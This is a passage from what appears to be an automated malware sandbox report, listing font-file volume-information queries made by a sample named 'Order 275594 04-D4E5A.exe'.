          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
